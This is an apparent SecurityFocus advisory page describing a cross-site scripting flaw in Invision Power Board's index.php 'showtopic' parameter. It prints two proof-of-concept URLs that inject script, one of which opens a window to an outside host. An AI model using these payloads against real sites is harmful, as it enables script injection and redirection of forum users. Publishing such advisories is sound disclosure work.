Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Invision Power Board Index.php Showtopic Cross-Site Scripting Vulnerability

The following proof of concept was provided:

http://www.example.com/index.php?showtopic='><script>window.open
(window.location.search.substring(79))
</script>http://binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision
http://www.example.com/?showtopic='><script>alert(window.document.url)</script><plaintext>







 

Privacy Statement
Copyright 2009, SecurityFocus